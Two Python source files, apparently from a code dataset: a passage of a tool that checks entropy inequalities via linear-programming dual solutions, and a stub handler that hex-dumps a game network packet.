expr = system.row_names[index]
if np.isclose(coef, 1):
return expr
if np.isclose(coef, round(coef)):
coef = int(round(coef))
return "{} * {}".format(expr, coef)
def format_dual_vector(system, vec):
    """Pretty-print the nonzero terms of a dual vector, one per line.

    Terms are sorted by descending length of their leading quantity,
    then lexicographically, and joined with '+' continuation lines.
    """
    def sort_key(term):
        return (-len(term.split()[0]), term)

    terms = [_format_dual_coef(system, index, coef)
             for index, coef in enumerate(vec)
             if not np.isclose(coef, 0)]
    return " " + "\n+ ".join(sorted(terms, key=sort_key))
def get_term_counts(system, vec):
    """Sum dual coefficients per row category, highest category first.

    Near-integer coefficients are rounded to ints before summing; exact
    zeros are dropped.
    """
    totals = {}
    for coef, cat in zip(vec, system.row_categ):
        rounded = round(coef)
        if np.isclose(coef, rounded):
            coef = int(rounded)
        if coef != 0:
            totals[cat] = totals.get(cat, 0) + coef
    return [totals[cat] for cat in sorted(totals, reverse=True)]
def indent(lines, amount, ch=' '):
    """Prefix every line of *lines* with *amount* copies of *ch*."""
    pad = amount * ch
    return "\n".join(pad + line for line in lines.split("\n"))
@application
def main(app):
    """Check each inequality in CHECK against the elemental (Shannon-type)
    inequalities on VARNAMES, printing whether it holds and, if so, the
    dual decomposition that proves it."""
    opts = app.opts
    varnames = opts['VARNAMES']
    num_vars = len(varnames)
    # Build the cone of elemental information inequalities over the
    # given variables, with human-readable column labels.
    system = System(np.array(list(elemental_inequalities(num_vars))),
                    column_varname_labels(varnames))
    check = System.load(opts['CHECK'])
    # Align the elemental system's columns with those of the file being
    # checked (fill=True pads columns missing from the check system).
    system, _ = system.slice(check.columns, fill=True)
    # Name each row after its elemental form (e.g. "H(X|Y)", "I(X;Y|Z)").
    system.row_names = [f.fmt(varnames) for f in elemental_forms(num_vars)]
    # Category per row, derived from the formatted name's length and
    # whether it is an entropy ('H') or mutual-information term.
    # NOTE(review): len(n)/2 is true division on Py3, so categories can be
    # non-integers -- presumably intentional ordering keys; confirm.
    system.row_categ = [len(n)/2-1 + (n[0]=='H')
                        for n in system.row_names]
    lp = system.lp()
    for ineq in check.matrix:
        # embed=True allows the inequality to live in a subspace of the
        # LP's column space.
        valid = lp.implies(ineq, embed=True)
        print(valid)
        if valid:
            # The dual solution gives the nonnegative combination of
            # elemental inequalities that proves the checked one.
            print(indent(format_dual_vector(system, lp.get_dual_solution()), 4))
            print(get_term_counts(system, lp.get_dual_solution()))
| coldfix/pystif | pystif/pitip.py | Python | gpl-3.0 | 2,067 |
from util.tipo import tipo
class S_PLAYER_CHANGE_EP(object):
    """Handler stub for the S_PLAYER_CHANGE_EP packet: dumps the raw
    payload as hex for reverse-engineering; no parsing is done yet."""
    def __init__(self, tracker, time, direction, opcode, data):
        # str(type(self)) looks like "<class 'a.b.c.ClassName'>"; index 3 of
        # the '.'-split picks out the class name.  NOTE(review): this breaks
        # if the module nesting depth changes -- confirm package layout.
        # [1:-1] strips the surrounding brackets from the hex-array repr.
        print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])
| jeff-alves/Tera | game/message/unused/S_PLAYER_CHANGE_EP.py | Python | mit | 230 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.